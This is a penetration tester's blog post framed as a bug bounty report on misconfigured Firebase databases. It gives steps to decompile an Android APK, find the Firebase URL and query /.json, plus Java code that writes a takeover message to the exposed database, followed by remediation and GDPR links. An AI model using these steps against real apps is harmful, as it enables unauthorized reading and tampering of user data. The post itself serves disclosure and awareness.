[ BUG BOUNTY ] Firebase Database Takeover

Steps to reproduce

  1. Get the APK of app you can use any of the tool to get the APK from the device for this POC i have used “APK Extractor” https://play.google.com/store/apps/details?id=com.ext.ui&hl=e
  2. Decompile the APK using apktool, follow the below command to extract the source code from the APK.
    https://ibotpeaches.github.io/Apktool/
  3. Go to the res/values/strings.xml and look for this and search for “firebase” keyword
  4. And you will find this URL “https://xyz.firebaseio.com/”
  5. Next, go to the browser and paste this URL “https://xyz.firebaseio.com/.json”
  6. You will observe “null” response will come, so it means the firebase database is public but in general, it should show “Permission Denied” based on the firebase database rule. https://firebase.google.com/docs/rules

Security Impact

Android Code Snippet

public class SampleFirebaseActivity extends AppCompatActivity {    [@Override](/override)
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_sample_firebase);
Firebase.setAndroidContext(this);
Firebase.getDefaultConfig().setPersistenceEnabled(true);
Firebase firebase = new Firebase("https://████████/"); firebase.child("test").setValue("Firebase Database take over by 1337"); }
}

Recent Attacks

  1. https://www.xda-developers.com/user-data-leak-misconfigured-firebase-backends/
  2. https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad
  3. https://blog.netspi.com/when-databases-attack-entry-points/

A blog regarding storing stolen records in your database

  1. https://www.foregenix.com/blog/magento-websites-stolen-credit-card-data-stored-in-your-database

Resolve Insecurities

  1. https://firebase.google.com/docs/database/security/resolve-insecurities

Firebase GDPR Ready

1. How does your organization ensure user transparency and control around data use?
2. Are you sure that your organization has the right consents in a place where these are needed under the GDPR?
3. Does your organization have the right systems to record user preferences and consents?
4. How will you show regulators and partners that you meet the principles of the GDPR and are an accountable organization?
  1. https://firebase.google.com/support/privacy
  2. https://www.termsfeed.com/blog/gdpr-firebase-dpo/
  3. https://firebase.google.com/terms/data-processing-terms

--

--

--

IT security { enthusiast } — Penetration Tester

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Danang Tri Atmaja

Danang Tri Atmaja

IT security { enthusiast } — Penetration Tester

More from Medium

How to Creat ASP.NET Core Web Application?. The Complete ASP.NET Core Developer Course 2022 Videos.

Git and GitHub

Troubleshooting basics with Github

Web developer intern at LGMVIP